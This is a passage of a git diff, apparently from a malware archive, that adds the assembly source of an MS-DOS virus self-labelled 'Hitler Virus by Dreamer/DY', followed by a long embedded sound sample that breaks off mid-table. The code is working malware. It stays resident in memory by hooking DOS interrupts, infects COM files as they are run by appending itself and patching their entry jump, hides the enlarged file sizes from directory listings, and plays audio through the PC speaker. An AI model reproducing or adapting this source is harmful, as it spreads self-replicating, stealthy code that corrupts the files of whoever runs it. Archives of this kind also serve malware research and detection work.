04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh + db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh + db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h + db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h + db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h + db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h + db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h + db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h + db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh + db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h + db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h + db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah + db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh + db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h + db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh + db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh + db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h + db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h + db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h + db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh + db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h + db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h + db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h + db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh + db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h + db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah + db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h, +slutt: + +size equ $-100h +pgf equ ($+16)/16 + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.hitler_.asm b/MSDOS/Virus.MSDOS.Unknown.hitler_.asm new file mode 100644 index 00000000..48ef0b85 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hitler_.asm @@ -0,0 +1,701 @@ + call rakett +old db ' !' +rakett: pop bp + push bp + add bp,-103h + + mov ax,42ABh + int 21h + jnc failed + + cli + mov ax,3521h + int 21h + mov w [bp+offset old21],bx + mov w [bp+offset old21+2],es + + mov al,1Ch + int 21h + cli + mov w [bp+offset old1C],bx + mov w [bp+offset old1C+2],es + mov w [bp+offset teller],16380 + sti + + call normalspeed + + mov si,ds + std + lodsb + cld + mov ds,si + + xor bx,bx + mov cx,pgf + cmp b [bx],'Z' + jne failed + mov ax,[bx+3] + sub ax,cx + jc failed + mov [bx+3],ax + sub [bx+12h],cx + mov es,[bx+12h] + + push cs + pop ds + + mov di,100h + mov si,bp + add si,di + mov cx,size + rep movsb + + push es + pop ds + mov ax,2521h + mov dx,offset ni21 + int 21h + mov al,1Ch + mov dx,offset ni1C + int 21h + +failed: push cs + push cs + pop ds + pop es + + pop si + mov di,100h + push di + movsw + movsw + movsb + + mov cx,0FFh + mov si,100h + ret + + +findFCB: popf + call int21 + pushf + or al,al + jnz backFCB + call stealth +backFCB: popf + iret + +stealth: push ax + push bx + push dx + push es + + mov ah,2Fh + call int21 + + cmp byte es:[bx],0FFh + jne normFCB + add bx,8 +normFCB: mov al,byte es:[bx+16h] + and al,31 + xor al,31 + jnz shitFCB + mov ax,word es:[bx+1Ch] + mov dx,word es:[bx+1Ch+2] + sub ax,size + sbb dx,0 + jc shitFCB + mov word es:[bx+1Ch],ax + mov word es:[bx+1Ch+2],dx +shitFCB: + pop es + pop dx + pop bx + pop ax + ret + +ni21: pushf + cmp ah,11h + je findFCB + cmp ah,12h + je findFCB + + cmp ax,42ABh + jne not_42AB + popf + clc + retf 2 +not_42AB: + cmp ax,4B00h + jne not_4B00 + +call install_24 + + push ax + push bx + push cx + push dx + push ds + push bp + + mov ax,4300h + call int21 + jc back1 + mov cs:old_attr,cx + + test cl,4 + jnz back1 + + mov ax,4301h + xor cx,cx + call int21 + jc back1 + + push dx + push ds + call infect + pop ds + pop dx + + mov ax,4301h +db 0B9h ;mov CX,... +old_attr dw 0 + call int21 + +back1: ;go here if the attrib-get fails + pop bp + pop ds + pop dx + pop cx + pop bx + pop ax + +call remove_24 + +not_4B00: +back: popf + db 0EAh +old21 dw 0,0 + +int21: pushf + call dword ptr cs:old21 + ret + +infect: mov ax,3D02h + call int21 + jnc okay_open +bad1: ret +okay_open: xchg bx,ax + mov ax,5700h + call int21 + push cx + mov bp,sp + push dx + + mov ah,3Fh + mov cx,5 + mov dx,offset old + push cs + pop ds + call int21 + jc close + cmp al,5 + jne close + + cmp word old[0],'MZ' + je close + cmp word old[0],'ZM' + je close + cmp old[0],0E9h + jne infect1 + cmp word old[3],'!' + jne infect1 + +close: pop dx + pop cx + mov ax,5701h + call int21 + mov ah,3Eh + call int21 + ret + +infect1: mov ax,4202h + xor cx,cx + xor dx,dx + call int21 + + or dx,dx + jnz close + cmp ax,59000 + jae close + + dec ax + dec ax + dec ax + + mov word ptr putjmp[1],ax + + mov ah,40h + mov cx,size + mov dx,100h + call int21 + jc close + cmp ax,size + jne close + + mov ax,4200h + xor cx,cx + xor dx,dx + call int21 + + mov ah,40h + mov cx,5 + mov dx,offset putjmp + call int21 + + or byte ss:[bp],31 + + jmp close + +putjmp db 0E9h + dw 0 + db '!' + +install_24: pushf + cli + push bx + push ds + xor bx,bx + mov ds,bx + push ds + lds bx,[24h*4] + mov cs:old24[0],bx + mov cs:old24[2],ds + pop ds + mov word [(24h*4)],offset ni24 + mov [(24h*4)+2],cs + pop ds + pop bx + sti + popf + ret + +remove_24: pushf + cli + push bx + push es + push ds + xor bx,bx + mov ds,bx + les bx,cs:old24[0] + + mov [(24h*4)],bx + mov [(24h*4)+2],es + + pop ds + pop es + pop bx + sti + popf + ret + +errflag db 0 + +db 'Hitler Virus by Dreamer/DY',0 + +ni24: mov al,3 + mov cs:errflag,1 + iret + +old24 dw 0,0 + +xofs dw offset sample +len equ 4131 +divisor equ 230 +teller dw 16380 + +ni1C: + cli + pushf + push ax + push ds + push si + + push cs + pop ds + + cmp teller,0 + je teller_ok + dec teller + jmp noreset +teller_ok: + mov al,34h + db 0E6h,43h ;out 43h,al + mov al,divisor + db 0E6h,40h ;out 40h,al + mov al,0 + db 0E6h,40h ;out 40h,al + + mov al,090h + db 0E6h,43h ;out 43h,al + mov si,xofs + lodsb + db 0E6h,42h ;out 42h,al + + db 0E4h,61h ;in al,61h + or al,3 + db 0E6h,61h ;out al,61h + + inc xofs + cmp xofs,len+offset sample + jb noreset + mov xofs,offset sample +noreset: + sti + pop si + pop ds + pop ax + popf + + db 0EAh +old1C dw 0,0 + +normalspeed: cli + push ax + mov al,34h + db 0E6h,43h + mov al,0 + db 0E6h,40h + db 0E6h,40h + pop ax + sti + ret + +sample: + + + + + db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h + db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h + db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h + db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah + db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh + db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h + db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh + db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h + db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh + db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h + db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h + db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h + db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah + db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h + db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh + db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h + db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh + db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh + db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah + db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch + db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h + db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h + db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h + db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h + db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h + db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h + db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh + db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h + db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h + db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h + db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh + db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h + db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h + db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h + db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h + db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h + db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h + db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh + db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h + db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh + db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh + db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h + db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh + db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh + db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h + db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh + db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh + db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h + db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h + db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah + db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h + db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h + db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h + db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh + db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h + db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h + db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h + db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h + db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh + db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h + db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h + db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h + db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh + db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h + db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh + db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh + db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah + db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h + db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h + db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh + db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h + db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh + db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh + db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h + db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh + db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h + db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah + db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah + db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h + db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch + db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h + db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h + db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h + db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h + db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h + db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah + db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h + db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh + db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h + db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h + db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah + db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h + db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h + db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh + db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h + db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh + db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h + db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h + db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch + db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h + db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh + db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah + db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh + db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h + db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh + db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah + db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh + db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h + db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h + db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh + db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h + db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah + db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h + db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h + db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h + db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h + db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h + db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h + db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h + db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h + db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h + db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h + db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h + db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh + db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h + db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h + db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h + db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh + db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh + db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h + db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h + db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh + db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh + db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh + db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh + db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h + db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah + db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h + db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh + db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h + db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h + db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h + db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h + db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh + db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h + db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh + db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h + db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h + db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h + db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh + db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh + db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch + db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h + db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh + db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh + db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h + db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h + db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h + db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h + db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h + db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh + db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah + db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh + db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh + db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h + db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh + db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h + db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h + db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h + db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh + db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh + db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h + db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah + db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh + db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh + db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah + db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h + db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh + db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh + db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h + db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h + db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h + db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h + db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh + db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h + db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h + db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh + db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h + db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh + db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh + db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh + db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh + db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh + db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h + db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h + db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch + db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch + db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h + db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h + db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh + db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h + db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h + db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h + db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h + db 